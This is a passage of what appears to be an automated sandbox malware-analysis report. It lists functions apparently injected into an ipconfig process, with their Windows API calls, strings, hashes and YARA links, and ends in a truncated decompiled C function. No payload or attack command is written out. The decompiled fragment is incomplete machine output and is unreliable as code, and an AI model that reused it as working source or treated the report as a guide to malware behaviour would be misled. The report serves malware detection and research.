                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 00765277
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Initialize
                                                                                                                                                                                                                                                                                                                            • String ID: @J7<$Wv
                                                                                                                                                                                                                                                                                                                            • API String ID: 2538663250-620054582
                                                                                                                                                                                                                                                                                                                            • Opcode ID: fdabf7b5db505f322b26d666cc15ed4f7dd1703429a28f603f12de03a6a01edc
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 429d9ccd6caab2486b851173a570fbc0efd8f7b50cda1e12c0d6ac3dd14c7829
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fdabf7b5db505f322b26d666cc15ed4f7dd1703429a28f603f12de03a6a01edc
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36311EB5A0060A9FDB10DFD9CC809EEB7B9BF88704F108559E916AB314D775EE058BA0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0076B4D0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 92sleepCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(000007D0), ref: 0076B58B
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                                                                                                                            • String ID: net.dll$wininet.dll
                                                                                                                                                                                                                                                                                                                            • API String ID: 3472027048-1269752229
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d2fb488befed4a909fb8a13b9c2cc6b334c3b65df8128701b9ab264cf4d4ff1c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: e37e99a5dcf90199cd2a7db5e932bb5146f8143a263fa7e964d1a08c879462ed
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2fb488befed4a909fb8a13b9c2cc6b334c3b65df8128701b9ab264cf4d4ff1c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B31B0B5600604BBC314DFA4D885FA7B7BCEB88700F14852EFA5E8B245D774B584CBA0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0076B4D5 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 77sleepCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(000007D0), ref: 0076B58B
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                                                                                                                            • String ID: net.dll$wininet.dll
                                                                                                                                                                                                                                                                                                                            • API String ID: 3472027048-1269752229
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 03a4b75a5d801c603145896dec8fb7e548b40f4e10ecbd2a32e91c30028ed911
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6b7461ab9bbe8db45464094b76acdbb7629900f49adb66f8a52b3fc3eadec88e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 03a4b75a5d801c603145896dec8fb7e548b40f4e10ecbd2a32e91c30028ed911
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF21C3B1A00604BBD714DFA4D885FAAF7B8EB45700F148129EA5E8B245D374A5908BD0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0075FCE0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 213COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 0075FE03
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                                                            • API String ID: 3188754299-2766056989
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 9809534ba83d6e49a1e1c11ac83f027b1e36c200dd768df37d1e236d3febccd0
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 67ef3e4419de614eaa8b4fe54f73a40978138b3a03b9d6eb15eb49ed0ed43243
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9809534ba83d6e49a1e1c11ac83f027b1e36c200dd768df37d1e236d3febccd0
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D7155B5900208ABD724DB64CC85FFBB37CAF54704F044999F91A57141EBB4AB858B61
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0075E7D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(rBv,?,?,00764272,00000000,?), ref: 0075E7FA
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                            • String ID: rBv
                                                                                                                                                                                                                                                                                                                            • API String ID: 3188754299-3541933218
                                                                                                                                                                                                                                                                                                                            • Opcode ID: fbd7769b11401556fd5dfb8e0c155d6676b9fa353c7acfce12e8380f7cc4621e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f539ed31703f4ce804b9d481f9da464961b8a0221fdff5a4bb4312b4a0b6bc92
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fbd7769b11401556fd5dfb8e0c155d6676b9fa353c7acfce12e8380f7cc4621e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62E086716502042BFB286BA89C4AFA633D88B8C724F184650FD1CDB2C2D5BCFA418154
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0076CBF0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,"u,0075E122,?,00000000,?,?), ref: 0076CC20
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                                                                                                            • String ID: "u
                                                                                                                                                                                                                                                                                                                            • API String ID: 3899507212-1278817916
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 883eed9231432d7abd4647319f9e2ca2356991150de218673098fd41ff504713
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ab12ac273d37cf4def621e587085ca0b54606a10c1bbcbbf61b88f7f63588284
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 883eed9231432d7abd4647319f9e2ca2356991150de218673098fd41ff504713
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4E01AB1600208ABCB20DF49CC45EE737ADEF88750F018054BE0957242CA34E9108BB1
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0075E7CF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(rBv,?,?,00764272,00000000,?), ref: 0075E7FA
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                            • String ID: rBv
                                                                                                                                                                                                                                                                                                                            • API String ID: 3188754299-3541933218
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 849948e8637777a171d353b3a25eff45076b290f619922d0629888fe0b784c9c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 824976a9ded66ec7a90d1e222091c35b4613e3f8b9dd1aa81e64c26fa8b6465e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 849948e8637777a171d353b3a25eff45076b290f619922d0629888fe0b784c9c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DDE086B191030416F7145B789D8AB9E37944B48734F180B54FD7DAE1D3D56CE5868214
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0075B170 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0075B1E2
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Load
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 65a26e238b0fc3214e5a8eb06d637f1bd91da8b934cc4b39fee1a4b98f2cb353
                                                                                                                                                                                                                                                                                                                            • Instruction ID: cc052d37ed48a080a6801630b2c5f56a27d5ba1fdfbabca10b6adb2364e05c5a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65a26e238b0fc3214e5a8eb06d637f1bd91da8b934cc4b39fee1a4b98f2cb353
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3011EB5E0020DEBDB10DAE4EC46FEDB7789B54308F0041A5ED09A7241F675EB18CB91
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0076B610 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,1A3BA613,00000000,00000000,0075DDE2,?,?,?,1A3BA613,?), ref: 0076B652
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 8b8a76fee942ebddfb6a39b60bc105da93b5d89102ce813b59f139349c03080f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 089acc167142adacf06eb2dc945ba2cb225ad952f8def1df42260d106791c33e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b8a76fee942ebddfb6a39b60bc105da93b5d89102ce813b59f139349c03080f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DBF0657338020476E72065E99C03FD7775CDB85BB1F140015FB0DDA1C1D595B44142E4
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0076B60D Relevance: 1.5, APIs: 1, Instructions: 32threadCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,1A3BA613,00000000,00000000,0075DDE2,?,?,?,1A3BA613,?), ref: 0076B652
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 440e58a7f387b6d06e997d1e41f47b131117f66fd034b777ac79d41687a69aa4
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2bdee20f172a44c39b0af5b771736605fe74c41b0a83b42747b5ba9f7c633442
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 440e58a7f387b6d06e997d1e41f47b131117f66fd034b777ac79d41687a69aa4
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1EE0D87338124076F37066A98C17FE7775C9F89BA1F180155FB4DEA1C1D599B84083A4
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0076CA90 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,7BE2EBFA,00000000,?), ref: 0076CABD
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f95d816122153e4f6ba7572dd350201478bef1adb6c1cf6280be4d011b5bc048
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0E01AB1200208ABCB14DF49DC49EA737ACEF88750F014054BD0957242C630E910CAB1
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0075E5D0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00758DAA,?), ref: 0075E601
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1b17c5891243f8f3adfc3b469a821885801ad8fbf1506d6a26ef0ba670c71a36
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ada9062a48aedc6aa9ddb97036da62c9de5a37636b123f8848ef4c1bd4315244
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b17c5891243f8f3adfc3b469a821885801ad8fbf1506d6a26ef0ba670c71a36
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18D05EB27942047BF614E6E59C07F97328C8B087A6F044054FD0CD62C2D998F60085A9
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0075E608 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00758DAA,?), ref: 0075E601
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 171855e8e25285d5f472a9da0f000eb475fd14290037d7e29b628587b30456c2
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7d5b00644c3dfc3562c83f90d1640cc0f506d8bd4f043c43115d08d2abb8ef2c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 171855e8e25285d5f472a9da0f000eb475fd14290037d7e29b628587b30456c2
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42B0126E34410294A66480F02C034E0250106401087098442605CC9A90EC4082160012
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0330967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c82f9ed7e762fc7a437cf33c84e4737eb32961c67e707d65443a6819a66697eb
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 696137f81102d98f3b0ad82853025af0ccf33900649c2fbc83be421f414786cf
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c82f9ed7e762fc7a437cf33c84e4737eb32961c67e707d65443a6819a66697eb
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85B09B719014D9C6D615D7604A4872B7D0477D1751F16C5A1D1020645B4778C0A1F5B5
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                                                                            Function 03395BA5 Relevance: .6, Instructions: 592COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                                                                                                                            			E03395BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x33a1178);
				E0331D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E03394C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0330D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E03395542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
